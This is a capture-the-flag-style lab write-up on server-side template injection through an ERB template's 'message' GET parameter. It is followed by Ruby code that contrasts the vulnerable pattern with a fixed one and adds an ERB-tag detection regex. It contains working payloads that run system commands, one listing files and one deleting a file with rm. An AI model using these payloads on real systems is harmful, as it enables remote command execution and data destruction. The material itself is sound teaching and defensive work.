When we click “View details” on the first product, we get a message:
![](https://niekdang.wordpress.com/wp-content/uploads/2020/11/image.png?w=1024)
This message is a parameter named “message” of a GET request.
Because this lab uses an ERB template, we will try to change the “message” parameter to:
?message=<%= 7*7 %>
The expression is evaluated, so this site has an SSTI vulnerability.
![](https://niekdang.wordpress.com/wp-content/uploads/2020/11/image-2.png?w=283)
To run system commands from Ruby, we use the function system(). We use the payload:
?message=<%= system("ls") %>
to list the files, and we find the target file “morale.txt”.
![](https://niekdang.wordpress.com/wp-content/uploads/2020/11/image-3.png?w=281)
Then we delete that file with the payload:
?message=<%= system("rm morale.txt") %>
![](https://niekdang.wordpress.com/wp-content/uploads/2020/11/image-5.png?w=1024)
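The root cause behind the lab is that the user-supplied “message” value ends up inside the ERB template source, so the engine compiles and executes it. The following is an added example (not the lab's code) that contrasts that vulnerable pattern with the fixed one, where the template is a developer-written constant and the message only reaches it as escaped data; the sample input and function names are constructed for illustration.

```ruby
require 'erb'

# Constructed sample input, standing in for the lab's "message" query parameter.
UNTRUSTED_MESSAGE = '<%= 7*7 %>'

# Vulnerable pattern: user input is interpolated into the template source itself,
# so ERB compiles and runs any tags the user supplied (including system() calls).
def render_unsafe(message)
  ERB.new("<p>#{message}</p>").result
end

# Hardened pattern: the template is a fixed string written by the developer;
# user input only ever reaches it as data, HTML-escaped on output.
SAFE_TEMPLATE = '<p><%= ERB::Util.html_escape(message) %></p>'

def render_safe(message)
  ERB.new(SAFE_TEMPLATE).result_with_hash(message: message)
end

# Simple detection check for request-log review or a WAF rule: flag parameter
# values carrying ERB tag syntax. Expect false positives on legitimate text
# that happens to contain "<%" ... "%>".
def erb_tag_present?(value)
  value.match?(/<%.*?%>/m)
end

if __FILE__ == $PROGRAM_NAME
  puts render_unsafe(UNTRUSTED_MESSAGE)    # <p>49</p>  (expression executed)
  puts render_safe(UNTRUSTED_MESSAGE)      # <p>&lt;%= 7*7 %&gt;</p>  (shown literally)
  puts erb_tag_present?(UNTRUSTED_MESSAGE) # true
end
```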